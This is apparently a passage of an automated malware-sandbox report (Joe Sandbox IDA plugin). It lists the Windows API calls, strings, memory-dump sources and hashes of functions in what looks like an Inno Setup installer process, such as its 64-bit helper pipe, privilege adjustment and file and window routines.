\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00455F4C
64-bit helper EXE wasn't extracted, xrefs: 00455EDA
g, xrefs: 00456061
Starting 64-bit helper process., xrefs: 00455EB4
D, xrefs: 00456027
CreateFile, xrefs: 00455FDA
Helper process PID: %u, xrefs: 00456105
CreateProcess, xrefs: 004560B7
CreateNamedPipe, xrefs: 00455F94
helper %d 0x%x, xrefs: 0045608D

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: HandleTime$CloseErrorLastNamedPipeSystem$CountCounterCreateCurrentDirectoryF47180FileLocalPerformanceProcessQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$g$helper %d 0x%x
API String ID: 2902378756-1343189204
Opcode ID: bcef79dbd4c116e068d320324f7cbf2eeb112e86b61b5acad7307fdb861079ce
Instruction ID: 4cf9e65d1c3a6a995f2f1225f91647b48c0c1d5ff0e907dc409e67b864181cf0
Opcode Fuzzy Hash: bcef79dbd4c116e068d320324f7cbf2eeb112e86b61b5acad7307fdb861079ce
Instruction Fuzzy Hash: 81714270E007449EDB10EB69CC42B9E77B8EB09705F5045AAFA08FB2C2D7785948CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00459734 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 00459756
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045976E
6CAD5550.KERNEL32(00000000,GetNamedSecurityInfoA,advapi32.dll), ref: 0045977B
6CAD5550.KERNEL32(00000000,SetNamedSecurityInfoA,00000000,GetNamedSecurityInfoA,advapi32.dll), ref: 00459788
6CAD5550.KERNEL32(00000000,SetEntriesInAclW,00000000,SetNamedSecurityInfoA,00000000,GetNamedSecurityInfoA,advapi32.dll), ref: 00459796
AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045994E), ref: 0045982A

Strings

SetEntriesInAclW, xrefs: 00459790
GetNamedSecurityInfoA, xrefs: 00459775
advapi32.dll, xrefs: 00459769
SetNamedSecurityInfoA, xrefs: 00459782

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550$AllocateHandleInitializeModuleVersion
String ID: GetNamedSecurityInfoA$SetEntriesInAclW$SetNamedSecurityInfoA$advapi32.dll
API String ID: 422192885-3478141794
Opcode ID: 8d17e719275ab2577aee2e47f0ea620ab2a40137b0091ccd33fc115fde3d0cc5
Instruction ID: 44abeef6ce0fed14890bb7ae348110eee090ef88d9448cfda06de1326518e158
Opcode Fuzzy Hash: 8d17e719275ab2577aee2e47f0ea620ab2a40137b0091ccd33fc115fde3d0cc5
Instruction Fuzzy Hash: 585140B1A00605EFDB10DB99C881BAFBBF8EF48711F20406AF904E6381D6399D05CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00422924 Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422ABC
ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422C86), ref: 00422ACC

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: MessageSendShowWindow
String ID:
API String ID: 1631623395-0
Opcode ID: 4fd2229586727529dd909d338d416359cb16df425a701a01cbc45ae89d0c01b5
Instruction ID: 5d0d6d93ff052dac4c0bf0c79e528bc47a43330df527cde392ec7e746acca06c
Opcode Fuzzy Hash: 4fd2229586727529dd909d338d416359cb16df425a701a01cbc45ae89d0c01b5
Instruction Fuzzy Hash: 21917370B00254EFDB11EFA9DA86F9D77F4AF04314F5101FAF504AB692C6B8AE409B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041844C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0041845B
GetWindowPlacement.USER32(?,0000002C), ref: 00418478
GetWindowRect.USER32 ref: 00418494
GetWindowLongA.USER32 ref: 004184A2
GetWindowLongA.USER32 ref: 004184B7
ScreenToClient.USER32 ref: 004184C0
ScreenToClient.USER32 ref: 004184CB

Strings

,, xrefs: 00418464

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 53ee8b5847548daf3ae9e12d513e94a971cd81012a05b2c07befe07581d38511
Instruction ID: 2402e33c498d75b28160bea17ed0089161511ec0534d6f9e4dfe72ad5a3a0ad4
Opcode Fuzzy Hash: 53ee8b5847548daf3ae9e12d513e94a971cd81012a05b2c07befe07581d38511
Instruction Fuzzy Hash: EA115E71504201ABDB00DF69C884F9B37D8AF48314F05467EBD58DB286DB38D800CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00453D80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00453D8F
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D95
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00453DB1
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DD8
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DDD

Part of subcall function 00453D60: MessageBoxA.USER32 ref: 00453D7A

6CF44E70.USER32(00000002,00000000), ref: 00453DF1

Strings

SeShutdownPrivilege, xrefs: 00453DAA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupMessageOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3685916817-3733053543
Opcode ID: 425daa456695ff12b040c707fb00818a360c311da1458f6e6ff48c0a39b208ab
Instruction ID: f4803013061f233bc47df458bdb93f2174b1bc76a245432ab8959e74f3c6c69c
Opcode Fuzzy Hash: 425daa456695ff12b040c707fb00818a360c311da1458f6e6ff48c0a39b208ab
Instruction Fuzzy Hash: B9F03C7064434166E620BEA68D47B5B75BC9B4078BF20452FBD10A91C3DBBD9A0C8A3F

Uniqueness

Uniqueness Score: -1.00%

Function 0048AC5C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0048AD9A,?,?,00000000,0048D628,?,0048AF24,00000000,0048AF78,?,?,00000000,0048D628), ref: 0048ACB3
6CAD69D0.KERNEL32(00000000,00000010), ref: 0048AD36
FindNextFileA.KERNEL32(000000FF,?,00000000,0048AD72,?,00000000,?,00000000,0048AD9A,?,?,00000000,0048D628,?,0048AF24,00000000), ref: 0048AD4E
FindClose.KERNEL32(000000FF,0048AD79,0048AD72,?,00000000,?,00000000,0048AD9A,?,?,00000000,0048D628,?,0048AF24,00000000,0048AF78), ref: 0048AD6C

Strings

isRS-, xrefs: 0048ACD3
isRS-???.tmp, xrefs: 0048AC9D

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 3541575487-3422211394
Opcode ID: 13330f41272388e9f7d5dbe32e1e5f4b1e15cd986a0661d02037791cef9b2fd9
Instruction ID: 0e7c5d1f6a80a2619a749149d95e7c55be76f1ac4ff9968a1b161a0a389471b0
Opcode Fuzzy Hash: 13330f41272388e9f7d5dbe32e1e5f4b1e15cd986a0661d02037791cef9b2fd9
Instruction Fuzzy Hash: 3031E571900508ABDB14EF65CC41ACEB7FDDB45315F1048B7A808E36A0D77C9E508B58

Uniqueness

Uniqueness Score: -1.00%

Function 00472CD4 Relevance: 9.2, APIs: 6, Instructions: 195fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,00472F9A,?,00000000,?,00000000,?,004730DE,00000000,00000000), ref: 00472D35
FindNextFileA.KERNEL32(000000FF,?,00000000,00472E45,?,00000000,?,?,00000000,?,00000000,00472F9A,?,00000000,?,00000000), ref: 00472E21
FindClose.KERNEL32(000000FF,00472E4C,00472E45,?,00000000,?,?,00000000,?,00000000,00472F9A,?,00000000,?,00000000), ref: 00472E3F
FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00472F9A,?,00000000,?,00000000,?,004730DE,00000000), ref: 00472E98

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Find$File$First$CloseNext
String ID:
API String ID: 2001080981-0
Opcode ID: 19af6ca45c2ba80f5662784d48fead29993f15fb787146533f472a9f9fb352f2
Instruction ID: 8565db096cd6656ff44318b7ce681326fcd64e26bd3c9e11326f6da54d8c9e2f
Opcode Fuzzy Hash: 19af6ca45c2ba80f5662784d48fead29993f15fb787146533f472a9f9fb352f2
Instruction Fuzzy Hash: 1D715D7090020DAFDF21DFA5CD41AEFBBB9EF49304F1080AAE408A7291D6799B45DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00455514 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 235windownativeCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00455591
PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004555B8
SetForegroundWindow.USER32(?,00000000,00455894,?,00000000,004558D0), ref: 004555C9
NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00455894,?,00000000,004558D0), ref: 0045587F

Strings

Cannot evaluate variable because [Code] isn't running yet, xrefs: 00455709

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: MessagePostWindow$ForegroundNtdllProc_
String ID: Cannot evaluate variable because [Code] isn't running yet
API String ID: 2236967946-3182603685
Opcode ID: c045dd0e4ffca7a39b73c25968a0fc1ea4027e2037cea88a701d7cc2bd8bc3cb
Instruction ID: b6dbf8914caa8b88eacadc0bf15bdb6cfef248980d0ce1246846ecff726245f3
Opcode Fuzzy Hash: c045dd0e4ffca7a39b73c25968a0fc1ea4027e2037cea88a701d7cc2bd8bc3cb
Instruction Fuzzy Hash: 2091F234604A04EFD715DF55C961F69BBF5EB49700F2184EAF904977A2C738AE04DB18

Uniqueness

Uniqueness Score: -1.00%

Function 004547A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,004548D4), ref: 004547D0
6CAD5550.KERNEL32(00000000,kernel32.dll,GetDiskFreeSpaceExA,00000000,004548D4), ref: 004547D6

Strings

GetDiskFreeSpaceExA, xrefs: 004547C6
kernel32.dll, xrefs: 004547CB

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550HandleModule
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 920177481-3712701948
Opcode ID: b24bdb0128d8144a5a3d3ab057e8c3d3c0be4aad0c5b06488440313102649fb1
Instruction ID: fdbcbf479f2cc21c60c0eaa899c79f38a2e8e07711426ce900d973d9a3396831
Opcode Fuzzy Hash: b24bdb0128d8144a5a3d3ab057e8c3d3c0be4aad0c5b06488440313102649fb1
Instruction Fuzzy Hash: 11318435A04659AFDB01EBE5C8929EEB7B8EF49304F50456AF800F7292D6385D09CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00417D98 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417DD7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417DF5
GetWindowPlacement.USER32(?,0000002C), ref: 00417E2B
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417E52

Strings

,, xrefs: 00417E19

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 0b81194dc1d1b1de540ed8c9507381ff605f161cdfbccd417236de09a261938e
Instruction ID: 882a3a085edc8f58efe4bb57e9082e6531e96cfad6ea4dffa077d9c007fbbeb8
Opcode Fuzzy Hash: 0b81194dc1d1b1de540ed8c9507381ff605f161cdfbccd417236de09a261938e
Instruction Fuzzy Hash: 66211B71600208ABCF10EF69D880EDA77B8AF48314F51456AFD18DF246D638ED448B68

Uniqueness

Uniqueness Score: -1.00%

Function 0045E244 Relevance: 7.6, APIs: 5, Instructions: 120fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,0045E3F8), ref: 0045E2B9
FindFirstFileA.KERNEL32(00000000,?,00000000,0045E3C3,?,00000001,00000000,0045E3F8), ref: 0045E2FF
FindNextFileA.KERNEL32(000000FF,?,00000000,0045E3A5,?,00000000,?,00000000,0045E3C3,?,00000001,00000000,0045E3F8), ref: 0045E385
FindClose.KERNEL32(000000FF,0045E3AC,0045E3A5,?,00000000,?,00000000,0045E3C3,?,00000001,00000000,0045E3F8), ref: 0045E39F

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: 02f22185026e8130c032ef72f42e6d07742c4e03d744510b1e6e5a8dfdb4d954
Instruction ID: 118e15ace6c4d21b16b4fc6ed86408dea88d0f343785c3a37886904967bb367b
Opcode Fuzzy Hash: 02f22185026e8130c032ef72f42e6d07742c4e03d744510b1e6e5a8dfdb4d954
Instruction Fuzzy Hash: 8A418671A006149FDB15DFA6CC81AAEB7B8EF88305F5044AAFC04E7341D67C9F488E58

Uniqueness

Uniqueness Score: -1.00%

Function 0045DEB0 Relevance: 7.6, APIs: 5, Instructions: 86fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,0045DFE1), ref: 0045DED8
FindFirstFileA.KERNEL32(00000000,?,00000000,0045DFC1,?,00000001,00000000,0045DFE1), ref: 0045DF1E
FindNextFileA.KERNEL32(000000FF,?,00000000,0045DFA3,?,00000000,?,00000000,0045DFC1,?,00000001,00000000,0045DFE1), ref: 0045DF83
FindClose.KERNEL32(000000FF,0045DFAA,0045DFA3,?,00000000,?,00000000,0045DFC1,?,00000001,00000000,0045DFE1), ref: 0045DF9D
SetErrorMode.KERNEL32(?,0045DFC8,0045DFC1,?,00000001,00000000,0045DFE1), ref: 0045DFBB

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Find$ErrorFileMode$CloseFirstNext
String ID:
API String ID: 3300381671-0
Opcode ID: aff3423789f717168a46b7fe3e5e644ec3e95599ad12f574d7c25b79c3c93c98
Instruction ID: 2cead2433a966ba10e75be37f65284a8db79719a2f7f50ebc2f7849e2f86b7b8
Opcode Fuzzy Hash: aff3423789f717168a46b7fe3e5e644ec3e95599ad12f574d7c25b79c3c93c98
Instruction Fuzzy Hash: 0A31E571A04608AFDB21EF61CC51ADEB7BCDF49704F5144B6FC09E7292D6386E448E68

Uniqueness

Uniqueness Score: -1.00%

Function 00478118 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00478156
GetWindowLongA.USER32 ref: 00478174
ShowWindow.USER32(00000000,00000005,00000000,000000F0,004ADF64,00477A18,00477A44,00000000,00477A64,?,?,00000001,004ADF64), ref: 00478196
ShowWindow.USER32(00000000,00000000,00000000,000000F0,004ADF64,00477A18,00477A44,00000000,00477A64,?,?,00000001,004ADF64), ref: 004781AA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$Show$IconicLong
String ID:
API String ID: 2754861897-0
Opcode ID: dd42d303b032d3669f183c7b283b3b541a3a0b03f4221659e2030451217323e5
Instruction ID: 07f2c47246589b5102690f02175be36208d71431ade03849a3bb04b26934ee78
Opcode Fuzzy Hash: dd42d303b032d3669f183c7b283b3b541a3a0b03f4221659e2030451217323e5
Instruction Fuzzy Hash: FA017C30B843805EE710BB25CD4ABD727899B09308F4445BFB80A9BBA2EF7C8C41870C

Uniqueness

Uniqueness Score: -1.00%

Function 0045CDA4 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0045CE78), ref: 0045CDFC
FindNextFileA.KERNEL32(000000FF,?,00000000,0045CE58,?,00000000,?,00000000,0045CE78), ref: 0045CE38
FindClose.KERNEL32(000000FF,0045CE5F,0045CE58,?,00000000,?,00000000,0045CE78), ref: 0045CE52

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: db52346ee326165819e288216a2168ba8f477c14be2641a93cd345d5abfd7dde
Instruction ID: 01286ba5e2f2dc1a8f3fd0daa9b101753f990c57140b8ec26d21c01e98d437ca
Opcode Fuzzy Hash: db52346ee326165819e288216a2168ba8f477c14be2641a93cd345d5abfd7dde
Instruction Fuzzy Hash: 3321D571504748AEDB21DB65CC82ADEBBBCDB49715F5044F7B808E22A2D63C5E48CA68

Uniqueness

Uniqueness Score: -1.00%

Function 004242A4 Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004242AC
SetActiveWindow.USER32(?,?,?,00465D23), ref: 004242B9

Part of subcall function 00423714: ShowWindow.USER32(00410718,00000009,?,00000000,0041EE6C,00423A02,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042372F

Part of subcall function 00423BDC: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021E2410,004242D2,?,?,?,00465D23), ref: 00423C17

SetFocus.USER32(00000000,?,?,?,00465D23), ref: 004242E6

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$ActiveFocusIconicShow
String ID:
API String ID: 649377781-0
Opcode ID: 525cc6e08a8bceea2193b1f85de86759ce4ac8d020da746bb49d1ed5d9845e83
Instruction ID: a1f033c8e576e22cefe5ec6a563bc8c5ffa65d0d10626093fa9beda1e522a0d9
Opcode Fuzzy Hash: 525cc6e08a8bceea2193b1f85de86759ce4ac8d020da746bb49d1ed5d9845e83
Instruction Fuzzy Hash: 3FF0D0717001104BCB10FFAAD885B9A23A8AF48305B5541BBBC49DF25BD67CDC018768

Uniqueness

Uniqueness Score: -1.00%

Function 00417D96 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417DD7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417DF5
GetWindowPlacement.USER32(?,0000002C), ref: 00417E2B
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417E52

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
